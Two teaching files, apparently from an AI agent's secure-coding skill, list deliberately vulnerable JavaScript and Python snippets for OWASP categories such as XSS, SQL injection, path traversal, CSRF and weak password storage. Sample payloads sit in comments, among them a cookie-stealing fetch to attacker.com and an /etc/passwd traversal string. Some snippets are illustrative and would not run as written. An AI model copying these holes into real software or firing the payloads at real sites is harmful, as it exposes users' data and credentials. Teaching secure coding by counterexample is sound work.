File: .agents/skills/secure-coding-practices/assets/examples/vulnerable-examples.js
/**
 * VULNERABLE: Secure Coding Practices Examples - JavaScript/Node.js
 * Reference: OWASP Secure Coding Practices Quick Reference Guide
 */

// ============================================
// VULNERABLE: Client-side Input Validation
// ============================================

// BAD: Only client-side validation
function registerUserClientSideOnly() {
    const username = document.getElementById('username').value;

    // Client-side validation (can be bypassed!)
    if (username.length < 3) {
        alert("Username too short");
        return;
    }

    // Send to server with no server-side validation
    fetch('/api/register', {
        method: 'POST',
        body: JSON.stringify({ username: username })
    });
}


// ============================================
// VULNERABLE: XSS via innerHTML
// ============================================

// VULNERABLE: User data directly into innerHTML
function displayUserComment(comment) {
    const container = document.getElementById('comments');

    // CRITICAL: Direct HTML insertion
    container.innerHTML += `<p>${comment}</p>`;

    // Payload: <img src=x onerror=alert('XSS')>
    // Result: Alert pops up, attacker has DOM access
}

// VULNERABLE: Using eval (dynamic code execution)
function evaluateExpression(userInput) {
    // NEVER do this with user input!
    const result = eval(userInput);

    // Payload: (function() { fetch('https://attacker.com/steal?data=' + document.cookie) })()
    // Result: Attacker gets all cookies
}


// ============================================
// VULNERABLE: SQL Injection (Node.js)
// ============================================

const mysql = require('mysql');
const connection = mysql.createConnection({ /* config */ });

// VULNERABLE: Dynamic SQL query
function getUserVulnerable(username) {
    const query = `SELECT * FROM users WHERE username = '${username}'`;

    connection.query(query, (err, results) => {
        if (err) throw err;
        return results[0];
    });
}

// Payload: username = "' OR '1'='1"
// Result: SELECT * FROM users WHERE username = '' OR '1'='1'
// Returns all users!


// ============================================
// VULNERABLE: Hardcoded Secrets
// ============================================

// CRITICAL: API key in code
const API_KEY = "sk-EXAMPLE-not-a-real-key";

// CRITICAL: Database password in code
const DB_PASSWORD = "PLACEHOLDER_PASSWORD";

// CRITICAL: JWT secret in code
const JWT_SECRET = "super-secret-key-do-not-share";

// When code is on GitHub, attacker gets everything!


// ============================================
// VULNERABLE: No Password Hashing
// ============================================

// VULNERABLE: Storing plaintext passwords
async function registerUserBadPassword(username, password) {
    const connection = await getDb();

    // CRITICAL: Plaintext password!
    await connection.query(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [username, password]
    );
}

// VULNERABLE: Weak hashing (MD5)
function hashPasswordBadly(password) {
    const crypto = require('crypto');

    // MD5 is cryptographically broken!
    return crypto.createHash('md5').update(password).digest('hex');
}


// ============================================
// VULNERABLE: Path Traversal
// ============================================

const express = require('express');
const fs = require('fs');

// VULNERABLE: User input directly as file path
app.get('/file/:filename', (req, res) => {
    const filename = req.params.filename;

    // No validation - attacker can use ../
    const filepath = `uploads/${filename}`;
    const content = fs.readFileSync(filepath);

    res.send(content);
});

// Payload: /file/../../../../etc/passwd
// Result: Server reads and sends /etc/passwd content!


// ============================================
// VULNERABLE: Missing Access Control
// ============================================

// VULNERABLE: No ownership check
app.get('/api/user/:userId', (req, res) => {
    const userId = req.params.userId;

    // No check if current user is authorized
    const user = getUser(userId);

    res.json({
        name: user.name,
        email: user.email,
        ssn: user.ssn,  // Sensitive!
        creditCard: user.creditCard  // Sensitive!
    });
});

// Attacker can fetch any user's data by changing userId


// ============================================
// VULNERABLE: Informative Error Messages
// ============================================

// VULNERABLE: Reveals system information
app.get('/api/data', (req, res) => {
    try {
        const data = getData();
        res.json(data);
    } catch (err) {
        // VULNERABLE: Returning full error details
        res.status(500).json({
            error: err.message,
            stack: err.stack,  // Exposes code structure!
            query: err.query   // Exposes database schema!
        });
    }
});


// ============================================
// VULNERABLE: Session Fixation
// ============================================

// VULNERABLE: Not regenerating session ID on login
function loginVulnerable(username, password) {
    if (validateCredentials(username, password)) {
        // VULNERABLE: Just adding user to existing session
        req.session.userId = userId;

        // Attacker can use this session before and after login!
    }
}


// ============================================
// VULNERABLE: No HTTPS Enforcement
// ============================================

// VULNERABLE: HTTP connection for sensitive data
async function loginNoHttps(username, password) {
    const response = await fetch('http://example.com/api/login', {
        method: 'POST',
        body: JSON.stringify({ username, password })
        // No HTTPS - credentials in plaintext!
    });
}


// ============================================
// VULNERABLE: Sensitive Data in Local Storage
// ============================================

// VULNERABLE: Storing secrets in local storage
function loginStoreBadly(token, apiKey) {
    // Local storage is accessible via JavaScript!
    localStorage.setItem('token', token);
    localStorage.setItem('apiKey', apiKey);

    // Any XSS attack can steal these!
}

// VULNERABLE: Storing in cookies without flags
document.cookie = `token=${token}`;  // No Secure, HttpOnly, SameSite flags


// ============================================
// VULNERABLE: Race Condition
// ============================================

let balance = 1000;

// VULNERABLE: Race condition without locking
async function withdrawMoneyRaceCondition(amount) {
    // Check balance
    if (balance >= amount) {
        // Simulate processing time
        await sleep(100);

        // Another thread could have changed balance here!
        balance -= amount;
    }
}

// Scenario:
// 1. Check: balance = 1000, want to withdraw 600 ✓
// 2. Other thread: withdraws 600, balance = 400
// 3. First thread: subtracts 600, balance = -200 (overdraft!)


// ============================================
// VULNERABLE: Unvalidated Redirects
// ============================================

// VULNERABLE: Using user input for redirect
function redirectVulnerable(req, res) {
    const url = req.query.redirect;

    // No validation - attacker can redirect to malicious site
    res.redirect(url);
}

// Payload: /api/logout?redirect=https://attacker.com/phishing
// User gets redirected to phishing site!


// ============================================
// VULNERABLE: CSRF - No Token
// ============================================

// VULNERABLE: No CSRF protection
app.post('/transfer', (req, res) => {
    const userId = req.session.userId;
    const amount = req.body.amount;
    const recipient = req.body.recipient;

    // No CSRF token validation!
    // Attacker's website can POST a form to this endpoint

    processTransfer(userId, amount, recipient);
    res.send("Transfer complete");
});

// Attack HTML:
// <form method="POST" action="https://bank.com/transfer">
//   <input name="amount" value="10000">
//   <input name="recipient" value="attacker">
//   <input type="submit">
// </form>


// ============================================
// VULNERABLE: Logging Sensitive Data
// ============================================

const logger = require('logger');

// VULNERABLE: Logging credentials
app.post('/login', (req, res) => {
    const username = req.body.username;
    const password = req.body.password;

    // CRITICAL: Logging password!
    logger.info(`Login attempt: ${username}, password: ${password}`);

    if (authenticate(username, password)) {
        // VULNERABLE: Logging token
        const token = generateToken(username);
        logger.info(`User ${username} logged in with token: ${token}`);

        res.json({ token });
    }
});


// ============================================
// VULNERABLE: No Rate Limiting
// ============================================

// VULNERABLE: No rate limiting on login endpoint
app.post('/login-no-rate-limit', (req, res) => {
    const username = req.body.username;
    const password = req.body.password;

    // Attacker can brute force passwords with no restrictions

    if (authenticate(username, password)) {
        res.json({ success: true });
    } else {
        res.status(401).json({ error: 'Invalid credentials' });
    }
});


// ============================================
// VULNERABLE: Deserialization Attack
// ============================================

const pickle = require('pickle');

// VULNERABLE: Unsafe deserialization
app.post('/deserialize', (req, res) => {
    const data = req.body.data;

    // Dangerous! Can execute arbitrary code
    const obj = pickle.loads(data);

    res.json(obj);
});

// Attacker sends pickled object that executes system command


// ============================================
// VULNERABLE: Default Credentials
// ============================================

// VULNERABLE: Not changing default admin credentials
const adminCredentials = {
    username: 'admin',
    password: 'PLACEHOLDER_PASSWORD'  // Default password!
};

// Attacker can login with well-known defaults


// ============================================
// VULNERABLE: Information Disclosure
// ============================================

// VULNERABLE: Exposing server version
app.use((req, res, next) => {
    res.header('Server', 'Apache/2.4.41 (Ubuntu)');  // Reveals version!
    next();
});

// VULNERABLE: Exposing framework version
app.use((req, res, next) => {
    res.header('X-Powered-By', 'Express/4.17.1');  // Reveals version!
    next();
});

// Attacker can target known vulnerabilities in these versions

File: .agents/skills/secure-coding-practices/assets/examples/vulnerable-examples.py
"""
VULNERABLE: Input Validation - Missing server-side validation
Domain: Input Validation
Issue: Client-side validation only, no server-side checks
Risk: Attacker can bypass client-side checks and send malicious data
"""

from flask import Flask, request
import re

app = Flask(__name__)

# VULNERABLE: Only JavaScript validation on client
@app.route('/register', methods=['POST'])
def register_vulnerable():
    """
    Vulnerable pattern: trusting client-side validation
    """
    username = request.form.get('username')
    age = request.form.get('age')
    email = request.form.get('email')

    # Assuming client-side validation happened... WRONG!
    # An attacker can send any value they want

    # No server-side validation - directly process
    user = create_user(username, age, email)
    return f"User {username} created!"


# VULNERABLE: Allow-list not used, only deny-list
@app.route('/upload', methods=['POST'])
def upload_vulnerable():
    """
    Vulnerable pattern: using deny-list instead of allow-list
    """
    file = request.files['file']

    # Deny-list approach (weak)
    blocked_extensions = ['.exe', '.bat', '.cmd', '.com']

    if not any(file.filename.endswith(ext) for ext in blocked_extensions):
        # Allow any file not in blocked list
        file.save(f'uploads/{file.filename}')
        return "File uploaded!"

    return "File type blocked"


# VULNERABLE: No data range validation
@app.route('/transfer', methods=['POST'])
def transfer_vulnerable():
    """
    Vulnerable: No validation of data range
    """
    amount = request.form.get('amount')
    recipient = request.form.get('recipient')

    # No range check - attacker can transfer negative amounts, huge amounts
    process_transfer(amount, recipient)
    return "Transfer processed"


# ============================================
# VULNERABLE: Output Encoding - XSS via template
# ============================================

from flask import render_template_string

@app.route('/greet/<name>')
def greet_vulnerable(name):
    """
    Vulnerable: User input inserted directly into HTML (XSS)
    """
    # Django/Jinja2 auto-escape disabled or not used
    template = f"<h1>Hello {name}!</h1>"
    return template

    # Payload: /greet/<img%20src=x%20onerror=alert('XSS')>
    # Result: <h1>Hello <img src=x onerror=alert('XSS')>!</h1>


# ============================================
# VULNERABLE: Authentication - Plaintext passwords
# ============================================

@app.route('/register_auth', methods=['POST'])
def register_auth_vulnerable():
    """
    Vulnerable: Storing passwords in plaintext
    """
    username = request.form['username']
    password = request.form['password']

    # CRITICAL: Storing plaintext password!
    store_user_in_db(username, password)

    return "User registered"

# Database storage (simulated)
users_db = {}
def store_user_in_db(username, password):
    # Vulnerable: plaintext
    users_db[username] = password


# VULNERABLE: Weak password hashing
@app.route('/register_weak_hash', methods=['POST'])
def register_weak_hash():
    """
    Vulnerable: Using weak hash function (MD5/SHA1)
    """
    import hashlib

    username = request.form['username']
    password = request.form['password']

    # VULNERABLE: MD5 is broken
    hashed = hashlib.md5(password.encode()).hexdigest()

    users_db[username] = hashed
    return "User registered"


# VULNERABLE: Informative error messages
@app.route('/login_bad_error', methods=['POST'])
def login_bad_error():
    """
    Vulnerable: Different error messages reveal if user exists
    """
    username = request.form['username']
    password = request.form['password']

    if username not in users_db:
        return "User not found"  # Reveals user doesn't exist!

    if users_db[username] != password:
        return "Password incorrect"  # Reveals user exists!

    return "Login successful"


# ============================================
# VULNERABLE: Session Management
# ============================================

@app.route('/login_bad_session', methods=['POST'])
def login_bad_session():
    """
    Vulnerable: Session ID in URL, not invalidated on logout
    """
    username = request.form['username']

    # Vulnerable: predictable session ID
    session_id = str(hash(username))

    # Store in URL (exposed to referer, logs, etc.)
    return f"<a href='/dashboard?sid={session_id}'>Dashboard</a>"


# ============================================
# VULNERABLE: SQL Injection
# ============================================

import sqlite3

def get_user_vulnerable(username):
    """
    Vulnerable: SQL injection via string concatenation
    """
    conn = sqlite3.connect('users.db')
    cursor = conn.cursor()

    # VULNERABLE: Dynamic SQL with user input
    query = f"SELECT * FROM users WHERE username = '{username}'"
    cursor.execute(query)

    return cursor.fetchone()

# Payload: admin' OR '1'='1
# Result: SELECT * FROM users WHERE username = 'admin' OR '1'='1'
# This returns all users!


# ============================================
# VULNERABLE: File Upload - Path Traversal
# ============================================

@app.route('/upload_file', methods=['POST'])
def upload_file_vulnerable():
    """
    Vulnerable: Using user input directly for file path
    """
    file = request.files['file']
    filename = request.form.get('filename')

    # VULNERABLE: No path validation
    filepath = f"uploads/{filename}"
    file.save(filepath)

    return "File uploaded"

# Payload: filename = "../../../etc/passwd"
# Result: File saved to /etc/passwd


# ============================================
# VULNERABLE: Hardcoded Credentials
# ============================================

API_KEY = "sk-EXAMPLE-not-a-real-key"  # EXPOSED!

DB_PASSWORD = "PLACEHOLDER_PASSWORD"  # In source code!

@app.route('/api/data')
def get_api_data():
    """
    Vulnerable: API key in code
    """
    import requests
    response = requests.get(
        'https://api.example.com/data',
        headers={'Authorization': f'Bearer {API_KEY}'}
    )
    return response.json()


# ============================================
# VULNERABLE: No HTTPS/TLS
# ============================================

@app.route('/login_no_tls', methods=['POST'])
def login_no_tls():
    """
    Vulnerable: Transmitting credentials over HTTP
    """
    username = request.form['username']
    password = request.form['password']

    # If running on HTTP, credentials are sent in plaintext!
    # Man-in-the-middle attacker can capture them

    if authenticate(username, password):
        return "Login successful"


# ============================================
# VULNERABLE: Missing Access Control
# ============================================

@app.route('/user/<int:user_id>')
def get_user_profile(user_id):
    """
    Vulnerable: No ownership check (direct object reference)
    """
    # No check if current user owns this profile
    user = get_user_from_db(user_id)

    return {
        'name': user.name,
        'email': user.email,
        'ssn': user.ssn,  # Sensitive!
        'phone': user.phone  # Sensitive!
    }

# Attacker can access any user's profile by changing user_id


# ============================================
# VULNERABLE: No Rate Limiting
# ============================================

@app.route('/send_email', methods=['POST'])
def send_email_vulnerable():
    """
    Vulnerable: No rate limiting on email sends
    """
    email = request.form['email']

    # No checks - attacker can spam
    send_email_to(email)

    return "Email sent"


# ============================================
# VULNERABLE: Error Messages Expose Details
# ============================================

@app.route('/process_data', methods=['POST'])
def process_data_vulnerable():
    """
    Vulnerable: Stack traces and system details in error response
    """
    try:
        data = request.json
        # Process data
        query = f"SELECT * FROM data WHERE id = {data['id']}"
        result = db.execute(query)
    except Exception as e:
        # VULNERABLE: Returning full exception details
        import traceback
        return {
            'error': str(e),
            'traceback': traceback.format_exc(),
            'query': query  # Exposes database structure!
        }, 500


# ============================================
# VULNERABLE: Sensitive Data in Logs
# ============================================

import logging

logger = logging.getLogger(__name__)

@app.route('/authenticate', methods=['POST'])
def authenticate_bad_logging():
    """
    Vulnerable: Logging sensitive information
    """
    username = request.form['username']
    password = request.form['password']

    # VULNERABLE: Logging password!
    logger.info(f"User {username} attempting login with password: {password}")

    if validate_credentials(username, password):
        return "Login successful"

    # VULNERABLE: Logging failed attempt with password
    logger.warning(f"Failed login for {username}, password was: {password}")


# ============================================
# VULNERABLE: Concurrent Access without Locking
# ============================================

import threading

class Counter:
    def __init__(self):
        self.value = 0  # No lock!

    def increment_vulnerable(self):
        """
        Vulnerable: Race condition due to no locking
        """
        # Read
        temp = self.value
        # Increment
        temp += 1
        # Write
        self.value = temp

        # Between read and write, another thread could modify value!
        # Result: Lost updates


counter = Counter()

def increment_from_multiple_threads():
    """
    Race condition: Expected 1000, but might be less
    """
    threads = []
    for _ in range(10):
        t = threading.Thread(target=counter.increment_vulnerable)
        threads.append(t)
        t.start()

    for t in threads:
        t.join()

    print(counter.value)  # Might not be 1000!
